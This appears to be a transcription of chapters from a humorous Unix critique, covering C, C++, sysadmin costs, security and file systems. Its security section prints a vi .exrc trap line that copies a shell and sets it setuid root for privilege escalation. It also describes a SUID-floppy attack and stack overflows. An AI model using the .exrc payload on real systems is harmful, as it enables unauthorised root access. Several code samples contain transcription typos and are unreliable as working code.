Most programs evolve: first the program's specifications are envisioned, then the insides of the program are cobbled together, and finally somebody writes the program's output routines. Pipes arrest this process: as soon as somebody starts throwing a half-baked Unix utility into a pipeline, its output specification is frozen, no matter how ambiguous, nonstandard, or inefficient it might be.

Pipes are not be-all and end-all of program communication. Our favorite Unix-loving book had this to say about the Macintosh, which doesn't have pipes:

“The Macintosh model, on the other hand, is the exact opposite. The system doesn't deal with character streams. Data files are extremely high level, usually assuming that they are specific to an application. When was the last time you piped the output of one program to another on a Mac? (Good lock even finding the pipe symbol.) Programs are monolithic, the better to completely understand what you are doing. You don't take MacFoo and MacBar and hook them together.” -From life with Unix, by Libes and Ressler

Yeah, those poor Mac users. They've got it so rough. Because they can't pipe streams of bytes around into their latest memo and gave text flow around it? How are they going to transfer a spreadsheet into their memo? And how could such users expect changes to be tracked automatically? Theu certainly shouldn't expect to be able to electronically mail this patched-together memo across the country and have it seamlessly read and edited at the other end, and the returned to them unscathed. We can't imagine how they've been transparently using all these programs together for the last 10 years and having them all work, all without pipes.

Research has shown that pipes and redirection are hard to use, not because of conceptual problems, but because of arbitrary and unintuitive limitations. It is documented that only those steeped in Unixdom, not run-of-the-mill users, can appreciate or use the power of pipes.

Find

“The most horrifying thing about Unix is that, no matter how many times you hit yourself over the head with it, you never quite manage to lose consciousness. It just goes on and on.” -Patrick Sobalvarro

The Apple Macintosh and Microsoft Windows have powerful file locators that are relatively easy to use and extremely reliable. These file finders were designed with a human user and modern networking in mind. The Unix file finder program, find, wasn't designed to work with humans, but with cpio -a Unix backup utility program. Find couldn't anticipate networks or enhancements to the file system such as symbolic links; even after extensive modifications, it still doesn't work well with either. As a result, despite its importance to humans who've misplaced their files, find doesn't work reliably or predictably.

The authors of Unix tried to keep find up to date with the rest of Unix, but it is a hard task. Today's find has special flags for NFS file systems, symbolic links, executing programs, conditionally executing programs if the user types “y”, and even directly archiving the found files in cpio or cpio-c format. Sun Microsystems modified find so that a background daemon builds a database of every file in the entire Unix file system which, for some strange reason, the find command will search if you type “find filename” without any other arguments. (Talk about a security violation!) Despite all of these hacks, find still doesn't work properly.

Part 9: Programming

“Hold still, this won't hurt a bit”

“Do not meddle in the affairs of Unix, for it is subtle and quick to core dump.” -Anonymous.

The wonderful Unix programming environment

The Unix zealots make much of the Unix “programming environment.” They claim Unix has a rich set of tools that makes programming easier. Unix is not the world's best software environment -it is not even a good one. The Unix programming tools are shame; interpreters remain the play toy of the very rich; and change logs and audit trails are recorded at the whim of the person being audited. Yet somehow Unix maintains its reputation as a programmer's dream. Maybe it lets programmers dream about being productive, rather than letting them actually be productive.

Don't know to make love, Stop

The ideal programming tool should be quick and easy to use for common tasks and, at the same time, powerful enough to handle tasks beyond that for which it was intended. Unfortunately, in their zeal to be general, many Unix tools forget about the quick and easy part. Make is one such tool. In abstract terms, make's input is a description of a dependency graph. Each node of the dependency graph contains a set of commands to be run when that node is out of date with respect to the nodes that id depends on. Nodes corresponds to files, and the file dates determine whether the file are out of date with respect to each other. A small dependency graph, or Makefile, is shown below:

program: source1.o source2.o
  cc -o program source1.o source2.o
source1.o: source1.c
  cc -c source1.c
source2.o: source2.c
  cc -c source2.c

In this graph, the nodes are program, source1.o, source2.o, source1.c and source2.c. The node program depends on the source1.o and source2.o nodes. When either source1.o or source2.o is newer that program, make will regenerate program by executing the command cc -o program source1.o source2.o. And, of course, if source1.c has been modified, the both source1.o and program will be out of date, necessitating a recompile and a relink.

While make's model is quite general, the designers forgot to make it easy to use for common cases. In fact, very few novices Unix programmers know exactly how utterly easy it is to screw yourself to a wall with make, until they do it.

Utility programs and man pages

Unix utilities are self-contained; each is free to interpret its command-line arguments as it sees fit. This freedom is annoying; instead of being able to learn a single set of conventions for command line arguments, you have to read a man page for each program to figure out how to use it.

The source is the documentation. Oh, great!

“If it was hard to write, it should be hard to understand.” -A Unix programmer

Back in the documentation chapter, we said that Unix programmers believe that the operating system's source code is the ultimate documentation. “After all”, says one noted Unix historian, “the source is the documentation that the operating system itself looks to when it tries to figure out what to do next.”

But trying to understand Unix by reading its source code is like trying to drive Ken Thompson's proverbial Unix car (the one with a single ”?“ on its dashboard) cross country.

The Unix kernel sources (in particular, the Berkeley Network Tape 2 sources available from ftp.uu.net) are mostly uncommitted, do not skip any lines between “paragraphs” of code, use plenty of goto's, and generally try very hard to be unfriendly to people trying to understand them. As one hacker put it, “Reading the Unix kernel source is like walking down a dark alley. I suddenly stop and think 'Oh no, I'm about to be mugged.'”

Of course, the kernel sources have their own version of the warning light. Splinkled throughout are little comments that look like this:

/* XXX */

These mean that something is wrong. You should able to figure out exactly what it is that's wrong in each case.

It can't be a bug, my makefile depends on it!

The programmers at BBN were generally the exception. Most Unix programmers don't fix bugs: most don't have source code. Those with the code know that fixing bugs won't help. That's why when most Unix programmers encounter a bug, they simply program around it.

It's a sad state of affairs: if one is going to solve a problem, why not solve it once and for all instead of for a single case that will have to repeated for each new program ad infinitum? Perhaps early Unix programmers were closet metaphysicians that believed in Nietzche's doctrine of Eternal Recurrence.

There are two schools of debugging thought. One is the “debugger as physician” school, which was popularized in early ITS and Lisp systems. In these environments, the debugger is always present in the running program and when the program crashes, the debugger/physician can diagnose the problem and make the program well again.

Unix follows the older “debugging as autopsy” model. In Unix, a broken program dies, leaving a core file, that is like a dead body in more ways than one. A Unix debugger then comes along and determines the cause of death. Interestingly enough, Unix programs tend to die from curable diseases, accidents, and negligence, just as people do.

Dealing with the Core

After your program has written out a core file, your fist task is to find it. This shouldn't be too difficult a task, because the core file is quite large -4,8 and even 12 megabytes core files are not uncommon.

Core files are large because they contain almost everything you need to debug your program from the moment it died: stack, data, pointers to code… everything, in fact, except the program's dynamic state. If you were debugging a network program, by the time your core file is created, it's too late, the program's network connection are gone. As an added slap, any files it might have had opened are now closed. Unfortunately, under Unix, it has to be that way.

For instance, one cannot run a debugger as a command-interpreter or transfer control to debugger when the operating system generates an exception. The only way to have a debugger take over from your program when it crashes is to run every program from your debugger.

Filename expansion

There is one exception to Unix's each-program-is-self-contained rule: file-name expansion. Very often, one wants Unix utilities to operate on one or more files. The Unix shells provide a shorthand for naming groups of files that are expanded by the shell, producing a list of files that is passed to the utility.

For example, say your directory contains the files A, B, and C. To remove all of these files, you might type 'rm *'. The shell will expand '*' to 'A B C' and pass these arguments to rm. There are many, many problems with this approach, which we discussed in the previous chapter. You should know, though, that using the shell to expand filenames is not an historical accident: it was a carefully reasoned designed decision. In “The Unix programming environment” by Kernighan and Mashey (IEEE Computer, April 1981), the authors claim that, “Incorporating this mechanism into the shell is more efficient that duplicating it everywhere and ensures that it is available to programs in a uniform way”

Robustness, or "All lines are shorter than 80 characters"

There is an amusing article in the December 1990 issue of “Communications of the ACM” entitled “An empirical study of the reliability of Unix utilities” by Miller, Fredriksen, and So. They fed random input to a number of Unix utility programs and found that they could make 24-33% (depending on which vendor's Unix was being tested) of the programs crash or hang. Occasionally the entire operating system panicked.

Most of the bugs were due to a number of well-known idioms of the C programming language. In fact, much of the inherent brain damage in Unix can be attributed to the C language. Unix's kernel and all its utilities are written in C. The noted linguistic theorist Benjamin Whorf said that our language determines what concepts we can think. C has his effect on Unix; it prevents programmers from writing robust software by making such as thing unthinkable.

The C language is minimal. It was designed to be compiled efficiently on a wide variety of computer hardware and, as a result, has language constructs that map easily onto computer hardware.

At the time Unix was created, writing an operating system's kernel in a high-level language was a revolutionary idea. The time has come to write one in a language that has some form of error checking.

C is a lowest-common-denominator language, built at a time when the lowest common denominator was quite low. If a PDP-11 didn't have it, then C doesn't have it. The last few decades of programming language research have shown that adding linguistic support for things like error handling, automatic memory management, and abstract data types can make it dramatically easier to produce robust, reliable software. C incorporates none of these findings. Because of C's popularity, there has been little motivation to add features such as data tags or hardware support for garbage collection into the last, current and next generation of microprocessors: these features would amount to nothing more than wasted silicon since the majority of programs, written in C, wouldn't use them.

Recall that C has no way to handle integer overflow. The solution when using C is simply to use integers that are larger than the problem you have to deal with -and hope that the problem doesn't get larger during the lifetime of your program.

C doesn't really have array either. It has something that looks like an array but is really a pointer to a memory location. There is an array indexing expression, array [index], that is merely shorthand for the expression (*(array+index)). Therefore it's equally valid to write index[array], which is also shorthand for (*(array+index)). Clever, huh? This duality can be commonly seen in the way C programs handle character arrays. Arrays variables are used interchangeably as pointers and as arrays.

To belabor the point, if you have:

char *str = "bugy";

… then the following equivalencies are also true:

0 [str]    == 'b'
*(str+1)   == 'u'
*(2+str)   == 'g'
str[3]     == 'y'

Isn't C grand?

The problem with this approach is that C doesn't do any automatic bounds checking on the array references. Why should it? The arrays are really just pointer, and you can have pointers to anywhere in memory, right? Well, you might want to ensure that a piece of code doesn't scribble all over arbitrary pieces of memory, especially if the piece of memory in question is important, like the program's stack.

This brings us to the first source of bugs mentioned in the Miller paper. Many of the programs that crashed did so while reading input into a character buffer that was allocated on the call stack. Many C programs do this; the following C function reads a line of input into a stack-allocated array and then calls do_it on the line of input.

a_function() {
  char c,buff[80];
  int i = 0;
  while ((c=getchar()) !+ '\n')
    buff [i++]=c;
  buff[i]='\000';
  do_it(buff);
}

Code like this litters Unix. Note how the stack buffer is 80 characters long -because most Unix files only have lines that are 80 characters long. Note also how there is no bounds check before a new character is stored in the character array and no test for an end-of-file condition. The bounds check is probably missing because the programmer likes how the assignment statement (c=getchar()) is embedded in the loop conditional of the while statement. There is no room to check for end-of-file because that line of code is already testing for the end of a line. Believe it or not, some people actually praise C for just this kind of terseness -understandability and maintainability be damned! Finally, do_it is called, and the character array suddenly becomes a pointer, which is passed as the first function argument.

When Unix users discover these built-in limits, they tend not to think that the bugs should be fixed. Instead, users develop ways to cope with the situation. For example, tar, the Unix “tape archiver” can't deal with path name longer that 100 characters (including directories). Solution: don't use tar to archive directories to tape, use dump. Better solution: Don't use deep subdirectories, sho that a file's absolute path name is never longer that 100 characters. The ultimate example of careless Unix programmers will probably occur at 10:14:07 p.m. on January 18, 2038, when Unix's 32-bit timeval field overflows…

To continue with our example, let's imagine that our function is called upon to read a line of input that is 85 characters long. The function will read the 85 characters with no problem but where do the last 5 characters end up? The answer is that they end up scribbling over whatever happened to be in the 5 bytes right after the character array. What was there before?

The two variables, c and i, might be allocated right after the character array and therefore might be corrupted by the 85-character input line. What about an 850-character input line? It would probably overwrite important bookkeeping information that the C runtime system stores on the stack, such as addresses for returning from subroutine calls. At best, corrupting this information will probably cause a program to crash.

We say “probably” because you can corrupt the runtime stack to achieve an effect that the original programmer never intended. Imagine that out function was called upon to read a really long line, over 2,000 characters, and that this line was set up to overwrite the bookkeeping information on the call stack so that when the C function returns, it will call a piece of code that was also embedded in the 2.000 character line. This embedded piece of code may do something truly useful, like exec a shell that can run command on the machine.

Exceptional conditions

The main challenge of writing robust software is gracefully handling errors and other exceptions. Unfortunately, C provides almost no support for handling exceptional conditions. As a result, few people learning programming in today's school and universities know what exceptions are.

Exceptions are conditions that can arise when a function does not behave as expected. Exceptions frequently occur when requesting system services such as allocating memory or opening files. Since C provides no exception handling support, the programmer must add several lines of exception-handling code for each service request.

For example, this is the way that all of the C textbooks say you are supposed to use the malloc() memory allocation function:

struct bpt *another_function() {
  struct bpt *result;

  result=malloc (sizeof (struct bpt));
  if (result==0) {
    fprint (stdrr, "error: malloc: ???\n");
    /*recover gracefully from the error*/
    [...]
    return 0;
  }
/* Do something interesting*/
[...]
return result;
}

The function another_function allocates a structure of type bpt and returns a pointer to the new struct. The code fragment shown allocates memory for the new struct. Since C provides no explicit exception-handling support, the C programmer is forced to write exception handlers for each and every system service request.

Or not. Many C programmers choose not to be bothered with such trivialities and simply omit the exception-handling code. Their programs look like this:

struct bpt *another_function () {
  struct bpt *result=malloc (sizeof(struct bpt));
  /*Do something interesting*/
  return result;
}

It's simpler, cleaner, and most of the time operating system service request don't return errors, right? Thus programs ordinarily appear bug free until they are put into extraordinary circumstances, whereupon they mysteriously fail.

Lisp implementations usually have real exception-handling systems. The exceptional conditions have names like OUT-OF-MEMORY and the programmer can establish exception handlers for specific types of conditions. These handlers get called automatically when the exception are raised -no intervention or special tests are needed on the part of the programmer. When used properly, these handlers lead to more robust software.

If you can't fix it, restart it!

So what do system administrators and others do with vital software that doesn't properly handle errors, bad data, and bad operating conditions? Well, if it runs OK for a short period of time, you can make it run for a long period of time by periodically restarting it. The solution isn't very reliable, nor scalable, but it is good enough to keep Unix creaking along.

Part 10: C++

“The COBOL of the 90s”

“Q. Where did the names 'C' and 'C++' come from? A. They were grades” -Jerry Leichter.

It was perhaps inevitable that out of the Unix philosophy of not ever making anything easy for the user would come a language like C++. The idea of object-oriented programming dates back to Simula in the 60s, hitting the big time with Smalltalk in the early 70s. Other books can tell you how using any of dozen of object-oriented languages can make programmers more productive, make code more robust, and reduce maintenance costs. Don't except to see any of these advantages in C++.

That's because C++ misses the point of what being object-oriented was all about. Instead of simplifying things, C++ sets a new world record for complexity. Like Unix, C++ was never designed, it mutated as one goofy mistake after another became obvious. There is no grammar specifying the language (something practically all other languages have), so you can't even tell when a given line of code is legitimate or not.

Comparing C++ to COBOL is unfair to COBOL, which actually was a marvelous feat of engineering, given the technology of its day. The only marvelous thing about C++ is that anyone manages to get any work done in it at all. Fortunately, most good programmers know that they can avoid c++ by writing largely in C, steering clear of most of the ridiculous features that they'll probably never understand anyway. Usually, this means writing their own non-object-oriented tools to get just the features they need. Of course, this means their code will be idiosyncratic, incompatible, and impossible to understand or reuse. But a thin veneer of C++ here and there is just enough to fool managers into approving their projects.

The assembly language of Object-oriented-programming.

There's nothing high-level about C++. To see why, let us look at properties of a true high-level language:

  • Elegance: there is a simple, easily understood relationship between the notation used by a high-level language and the concepts expressed.
  • Abstraction: each expression is a high-level language describes one and only one concept. Concepts may be described independently and combined freely.
  • Power: with a high-level language, any precise and complete description of the desired behavior of a program may be expressed straightforwardly in that language.

A high-level language lets programmers express solutions in a manner appropriate to the problem. High-level programs are relatively easy to maintain because their intent is clear. From one piece of high-level source code, modern compilers can generate very efficient code for a wide variety of platforms, so high-level code is naturally very portable and reusable.

A low-level language demands attention to myriad details, most of which have more to do with the machine's internal operation that with the problem being solved. Not only does this make the code inscrutable, but it builds in obsolescence. As new system come along, practically every other year these days, low-level code becomes out of date and must be manually patched or converted at enormous expense.

Pardon me, your memory is leaking...

It's well known that the vast majority of program errors have to do with memory mismanagement. Before you can use an object, you have to allocate some space for it, initialize it properly, keep track of it somehow, and dispose of it properly. Of course, each of these tasks is extraordinarily tedious and error-prone, with disastrous consequences for the slightest error. Detecting and correcting these mistakes are notoriously difficult, because they are often sensitive to subtle differences in configuration and usage patterns for different users.

Use a pointer to a structure (but forget to allocate memory for it), and your program will crash. Use an improperly initialized structure, and it corrupts your program, and it will crash. but perhaps not right away. Fail to keep track of an object, and you might deallocate its space while it's still in use. Crash city. Better allocate some more structures to keep track of the structures that you need to allocate space for. But if you're conservative, and never reclaim an object unless you're absolutely sure it's no longer in use, watch out. Pretty soon you'll fill up with unreclaimed objects, run out of memory, and crash. This is the dreaded “memory leak”.

Most real high-level languages give you a solution for this -it's called a garbage collector. It tracks all you objects for you, recycles them when they're done, and never makes a mistake. When you use a language with a built-in garbage collector, several wonderful things happen:

  • The vast majority of your bugs immediately disappear. Now, isn't that nice?
  • Your code becomes much smaller and easier to write and understand, because it isn't cluttered with memory-management details.
  • Your code is more likely to run at maximum efficiency on many different platforms in many different configurations.

C++ users, alas, are forced to pick up their garbage manually. Many have brainwashed into thinking that somehow this is more efficient that using something written by experts specially for the platform they use.

The evolution of a programmer.

/*High school/Junior high*/

	10 PRINT "HELLO WORLD"
	20 END

/*First year in college*/

	program Hello (input, output);
	      begin
		writeln ('Hello world');
	      end.

/*Senior year in college*/

	(defun hello ()
	      (print (list 'HELLO 'WORLD)))

/*New professional*/

	#include <stdio.h>
	main (argc, argv)
	int argc;
	char **argv; {
	      printf ("Hello World!\n");
	}

/*Seasoned pro*/

	#include <stream.h>

	const int MAXLEN=80;

	class outstring;
	class outstring {
	      private:

	      int size;
	      char str[MAXLEN];

	      public:

	      outstring() {size=0;}
	      ~outstring() {size=0;}
	      void print();
	      void assign (char *chrs);
	};

	void outstring::print() {
	int i;
	for (i=0; i<size; i++)
	      count << str [i];
	cout<<"\n";
	}

	void outstring::assign (char *chrs) {
	int i;
	for (i=0; chrs [i] != '\0'; i++)
	      str[i]=chrs[i];
	size=i;
	}

	main (int argc, char **argv) {
	outstring string;

	string.assign ("Hello World!");
	string.print();
	}

/*Manager*/

"George, I need a program to output the string 'Hello World!'"

Part 11: System Administration

“Unix's Hidden Cost”

“If the automobile had followed the same development as the computer, a Rolls-Royce would today cost $100, get a million miles per gallon, and explode once a year killing everyone inside.” -Robert Cringely, InfoWorld.

All Unix systems require a System Administrator, affectionately known as a Sysadmin. The sysadmin's duties include:

  • Bringing the system up.
  • Installing new software.
  • Administrating user accounts.
  • Tuning the system for maximum performance.
  • Overseeing system security.
  • Performing routine backups.
  • Shutting down the system to install new hardware.
  • Helping users out of jams.

The thesis of this chapter is that the economics of maintaining a Unix system is very poor and that the overall cost of keeping Unix running is much higher that the cost of maintaining the hardware that hosts it.

Paying someone $40,000 a year to maintain 20 machines translates into $2000 per machine-year. Typical low-end Unix workstation cost between $3000 and $5000 and are replaced about every two years. Combine these costs with the cost of the machine and software, it becomes clear that the allegedly cost-effective “solution” of “open systems” isn't really cost-effective at all.

Keeping Unix running and tuned.

Sysadmins are highly paid baby sitters. Just as a baby transforms perfectly good input into excrement, which it then drops in its diapers. Unix drops excrement all over its file system and the network in the form of dumps from crashing programs, temporary files that aren't, cancerous log files, and illegitimate network rebroadcasts. But unlike the baby, who may smear his nuggets around but generally keeps them in his diapers. Unix play hide and seek with its waste. Without an experienced sysadmin to ferret them out, the system slowly runs out of space, starts to stink, gets uncomfortable, and complains or just dies.

Unix Systems become senile in weeks, not years.

Unix was developed in a research environment where systems rarely stayed up for several days. It was not designed to stay up for weeks at a time, let alone continuously. Compounding the problem is how Unix utilities and applications (especially those from Berkeley) are seemingly developed; a programmer types in some code, compiles it, runs it, and waits for it to crash. Programs that don't crash are presumed to be running correctly. Production-style quality assurance, so vital for third-party application developers, wasn't part of the development culture.

It's not surprising that most major Unix systems suffer from memory leaks, garbage accumulation, and slow corruption of their address space -problems that typically only show themselves after a program has been running for a few days.

Disk partitions and backups.

Disk space management is a chore on all types of computer systems; on Unix, it's a Herculean task. Before loading Unix onto your disk, you must decide upon a space allocation for each of Unix's partitions. Unix pretends your disk drive as a collection of smaller disks (each containing a complete file system), as opposed to other systems like TOP-20, which let you create a larger logical disk out of a collection of smaller physical disks.

Every alleged feature of disk partitions is really there to mask some bug or misdesign. For example, disk partitions allow you to dump or not dump certain sections of the disk without needing to dump the whole disk. But this “feature” is only needed because the dump program can only dump a complete file system. Disk partitions are touted as hard disk quotas that limit the amount of space a runaway process or user can use up before his programs halts. This “feature” masks a deficient file system that provides no facilities for placing disk quotas limits on directories or portions of a file system. These “features” engender further bugs and problems, which, not surprisingly, require a sysadmin (and additional, recurring costs) to fix. Unix commonly fails when a program or user fills up the /tmp directory, thus causing most other processes that require temporary disk space to fail. Most Unix programs don't check whether writes to disk complete successfully; instead, they just proceed merrily along, writing your email to a full disk. In comes the sysadmin, who “solves” the problem by rebooting the system because the boot process will clear out all the crud that accumulated in the /tmp directory. So now you know why boot process cleans out /tmp.

The swap partition is another fixed size chunk of disk that frequently turns out not to be large enough. In the old days, when disks were small, and fast disks were much more expensive that slow ones, it made sense to put the entire swap partition on a single fast, small drive. But it no longer makes sense to have the swap be a fixed size.

The problem of fixed size disk partitions still hurts less now that gigabyte disks are standard equipment. The manufacturers ship machines with disk partition large enough to avoid problems. It's a relatively expensive solution, but much easier to implement that fixing Unix.

Partitions: Twice the Fun.

Because of Unix's tendency to trash its own file system, early Unix gurus developed a workaround to keep of their files from getting regularly trashed: partition the disk into separate spaces. If the system crashes, and you get lucky, only half your data will be gone. The file system gets trashed because the free list on disk is usually inconsistent. When Unix crashes, the disks with the most activity get the most corrupted, because those are the most inconsistent disks -that is, they had the greatest amount of information in memory and not on the disk. The gurus decided to partition the disks instead, dividing a simple physical disk into several, smaller, virtual disks, each with its own file system.

There are two simple rules that should be obeyed when partitioning disks:

  1. Partitions must not overlap
  2. Each partition must be allocated for only one purpose

Part 12: Security

“Oh, I'm sorry, Sir, Go ahead, I didn't realize you were root”

“Unix is computer-scientology, not computer science.” -Dave Mankins.

The term “Unix security” is, almost by definition, an oxymoron because the Unix operating system was not designed to be secure, except for the vulnerable and ill-designed root/rootless distinction. Security measures to thwart attack were an afterthough. Thus, when Unix is behaving as expected, it is not secure, and making Unix run “securely” means forcing it to do unnatural acts. It's like the dancing dog at a circus, but not as funny -especially when it is your files that are being eaten by the dog.

Holes in the armor.

Two fundamental design flaws prevent Unix from being secure. First, Unix stores security information about the computer inside the computer itself, without encryption or the other mathematical protections. It's like leaving the keys to your safe sitting on your desk: as soon as an attacker breaks through the Unix front door, he's compromised the entire system. Second, the Unix superuser concept is a fundamental security weakness.

Superuser:The Superflaw

All multiuser operating systems need privileged accounts. Virtually all multiuser operating systems other than Unix apportion privilege according to need. Unix's “superuser” is all-or-nothing. An administrator who can change people's passwords must also, by design, be able to wipe out every file on the system. That high school kid you've hired to do backups might accidentally (or intentionally) leave your system open to attack.

Many Unix programs and utilities require Superuser privileges. Complex and useful programs need to create files or write in directories to which the user of the program does not have access. To ensure security, programs that run as superuser must be carefully scrutinized to ensure that they exhibit no unintended side effects and have no holes that could be exploited to gain unauthorized superuser access. Unfortunately, this security audit procedure is rarely performed (most third-party software vendors, for example, are unwilling to disclose their source code to their customers, so these companies couldn't even conduct an audit if they wanted).

The problem with SUID

The Unix concept called SUID, or setuid, raises as many security problems as the superuser concept does. SUID is a built-in security hole that provides a way for regular users to run commands that require special privileges to operate. When run, an SUID program assumes the privileges of the person who installed the program, rather that the person who is running the program. Most SUID programs are installed SUID root, so they run with superuser privileges.

The designer of Unix operating system would have us believe that SUID is a fundamental requirement of an advanced operating system. The most common example given is /bin/passwd, the Unix program that lets users change their passwords. The /bin/passwd program change a user's password by modifying the contents of the file /etc/passwd. Ordinary users can't be allowed to directly modify /etc/passwd because then they could change each other's passwords. The /bin/passwd program, which is run by mere users, assumes superuser privileges when run and is constructed to change only the password of the user running it and nobody else's.

Unfortunately, while /bin/passwd is running as superuser, it doesn't just have permission to modify the file /etc/passwd: it has permission to modify any file, indeed, do anything it wants. (After all, it's running as root, with no security checks). If it can be subverted while it is running -for example, if it can be convinced to create a subshell- then the attacking user can inherit these superuser privileges to control the system.

AT&T was so pleased with the SUID concept that it patented it. The intent was that SUID would simplify operating system design by obviating the need for a monolithic subsystem responsible for all aspects of system security. Experience has shown that most of Unix's security flaws come from SUID programs.

When combined with removable media (such as floppy disks or SyQuest drives), SUID gives the attacker a power full way to break into otherwise “secure” systems: simply put a SUID root file on a floppy disk and mount it, the run the SUID root program to become root. (The Unix-savvy reader might object to this attack, saying that mount is a privileged command that requires superuser privileges to run. Unfortunately, many manufacturers now provide SUID programs for mounting removable media specifically to ameliorate this “inconvenience”.)

Processes are cheap -and dangerous.

Another software tool for breaking Unix security are the systems calls fork() and exec(), which enable one program to spawn other programs. Programs spawning subprograms lie at the heart of Unix's tool-based philosophy. Emacs and FTP run sub processes to accomplish specific tasks such as listing files. The problem for the security-conscious is that these programs inherit the privileges of the programs that spawn them.

Easily spawned sub processes are a two-edged sword because a spawned subprogram can be a shell that lowers the drawbridge to let the Mongol hordes in. When the spawning program is running as superuser, then its spawned process also run as superuser. Many a cracker has gained entry through spawned superuser shells.

The problem with PATH

Unix has to locate the executable image that corresponds to a given command name. To find the executable, Unix consults the user's PATH variable for a list of directories to search. For example, if your PATH environment is :/bin:/usr/bin:/etc:/usr/local/bin then, when you type snarf, Unix will automatically search through the /bin, /usr/bin/, /etc, and /usr/local/bin directories, in that order, for a program snarf.

So far, so good. However, PATH variables such as this are a common disaster:

PATH=:.:/bin:/usr/bin:/usr/local/bin:

Startup traps

When a complicated Unix program starts up, it reads configuration files from either the user's home directory and/or the current directory to set initial and default parameters that customize the program to the user's specifications. Unfortunately, start up files can be created and left by other users to do their bidding on your behalf.

An extremely well-known startup trap preys upon vi, a simple, fast screen-oriented editor that's preferred by many sysadmins. It's too bad that vi can't edit more that one file at a time, which is why sysadmins frequently start up vi from their current directory, rather than in their home directory. Therein lies the rub.

At startup, vi searches for a file called .exrc, the vi startup file, in the current directory. Want to steal a few privs? Put a file called .exrc with the following contents into a directory:

!(cp /bin/sh /tmp/.s$$; chmod 4755 /tmp/.s$$)&

and then wait for an unsuspecting sysadmin to invoke vi from that directory. When she does, she'll see a flashing exclamation mark at the bottom of her screen for a brief instant, and you'll have an SUID shell waiting for you in /tmp.

Part 13: The File System

“Sure, it corrupts your files, but look how fast it is!”

“Pretty daring of you to be storing important files on a Unix system.” -Robert E. Seastrom.

The traditional Unix file system is a grotesque hack that, over the years, has been enshrined as a “standard” by virtue of its widespread use. Indeed after years of indoctrination and brainwashing, people now accept Unix's flaws as desired features. It's like a cancer victim's immune system enshrining the carcinom a cell as ideal because the body is so good at making them.

Way back in the chapter “Welcome, New user” we started a list of what's wrong with the Unix file systems. For users, we wrote, the most obvious failing is that the file systems don't have version numbers and Unix doesn't have an “undelete” capability -two faults that combine like sodium and water in the hands of most users.

But the real faults of Unix file systems run far deeper that these two missing features. The faults are not faults of execution, but of ideology. With Unix, we often are told that “everything is a file”. Thus, it's not surprising that many of Unix's fundamental faults lie with the file system as well.

What's a file system?

A file system is the part of a computer's operating system that manages file storage on mass-storage devices such as floppy disks and hard drives. Each piece of information has a name, called the filename, and a unique place (we hope) on the hard disk. The file system's duty is to translate names such as /etc/passwd into locations on the disk such as “block 32156 of hard disk #2”. It also supports the reading and writing of a file's blocks. Although conceptually a separable part of the operating system, in practice, nearly every operating system in use today comes with its own peculiar file system.

Meet the relatives.

In the past two decades, the evil stepmother Unix has spawned not one, not two, but four different file systems. These step-systems all behave slightly differently when running the same program under the same circumstances.

The seminal Unix File System (UFS), the eldest hald-sister, was sired in the early 1970s by the original Unix team at Bell Labs. Its most salient feature was its freewheeling conventions for filenames: it imposed no restrictions on the characters in a filename other that disallowing the slash character (”/“) and the ASCII NUL. As a result, filenames could contain a multitude of unprintable (and untypable) characters, a “feature” often exploited for its applications to “security”. Oh, UFS also limited filenames to 14 characters in lenght.

The Berkeley Fast (and loose) File System (FFS) was a genetic makeover of UFS engineered at the University of California at Berkeley. It wasn't fast, but it was faster than the UFS it replaced, much in the same way that a turtle is faster than a slug.

Berkeley actually made a variety of legitimate, practical improvements to the UFS. Most importantly, FFS eliminated UFS's infamous 14-character filename limit. It introduced a variety of new and incompatible features. Foremost among these was symbolic links -entries in the file system that could point to other files, directories, devices, or whatnot. Nevertheless, Berkeley's “fixes” would have been great had they been back-propagated to Bell Labs. But in a classic example of Not Invented Here, AT&T refused Berkeley's new code, leading to two increasingly divergent file systems with a whole host of mutually incompatible file semantics. Throughout the 1980s, some “standard” Unix programs knew that filenames could be longer than 14 characters, others didn't. Some knew that a “file” in the file system might actually be a symbolic link. Others didn't. Some programs worked as expected. Most didn't.

Sun began the Network File System NFS. NFS allegedly lets different networked Unix computers share files “transparently”. With NFS, one computer is designated as a “file server”, and another computer is called the “client”. The (somewhat dubious) goal is for the files and file hierarchies on the server to appear more or less on the client in more or less the same way that they appear on the server. Although Apollo Computers had a network file system that worked better than NFS several years before NFS was a commercial product, NFS became the dominant standard because it was “operating system independent” and Sun promoted it as an “open standard”.

Visualize a File System.

Take a few moments to imagine what features a good file system might provide to an operating system, and you'll quickly see the problems shared by all of the file systems described in this chapter.

A good file system imposes as little structure as needed or as much structure as is required on the data it contains. It fits itself to your needs, rather than requiring you to tailor your data and your programs to its peculiarities. A good file system provides the user with byte-level granularity -it lets you open a file and read or write a single byte- but it also provides support for record-based operations: reading, writing or locking a database record-by-record. (This might be one of the reasons that most Unix database companies bypass the Unix file system entirely and implement their own.)

More than simple database support, a mature file systems allow applications or users to store out-of-band information with each file. At the very least, the file system should allow you to store a file “type” with each file. The type indicates what is stored inside the file, be it program code, an executable the length of each record, or a graphical image. The file system should store the length of each record, access control lists (the names of the individuals who are allowed to access the contents of the files and the rights of each user), and so on. Truly advanced file systems allow users to stores comments with each file.

Advanced file systems exploit the features of modern hard disk drives and controllers. For example, since most disk drives can Transfer up to 64 Kbytes in a single burst, advanced file systems store files in contiguous blocks so they can be read and written in a single operation. They also have support for scatter/gather operations, so many individual reads or writes can be batched up and executed as one.

No File Types

To UFS and all Unix-derived file systems, files are nothing more than long sequences of bytes. (A bag'o' bytes, as the mythology goes, even though they are technically not bags, but streams). Programs are free to interpret those bytes however they wish. To make this easier, Unix doesn't store type information with each file. Instead, Unix forces the user to encode this information in the file's name! Files ending with a ”.c“ are C source files, files ending with a ”.o“ are object files, and so forth. This makes it easy to burn your fingers when renaming files.

To resolve this problem, some Unix files have “magic numbers” that are contained in the file's first few bytes. Only some files -shell scripts, ”.o“ files and executable programs -have magic numbers. What happens when a file's “type” (as indicated by its extension) and its magic number don't agree? That depends on the particular program you happen to be running. The loader will just complain and exit. The exec() family of kernel functions, on the other hand, might try starting up a copy of /bin/sh and giving your file to that shell as input.

Only the Most Perfect Disk Pack Need Apply

One common problem with Unix is perfection: while offering none of its own, the operating system demands perfection from the hardware upon which it runs. That's because Unix programs usually don't check for hardware error -they just blindly stumble along when things begin to fail, until they trip and panic.

The dictionary defines panic as “a sudden overpowering fright; especially a sudden unreasoning terror often accompanied by mass flight”. That's a pretty good description of a Unix panic: the computer prints the word “panic” on the system console and halts, trashing your file system in the process.

Part 14: NFS

“Nightmare file system”

“The “N” in NFS stands for Not, or Need, or perhaps Nightmare.” -Henry Spencer.

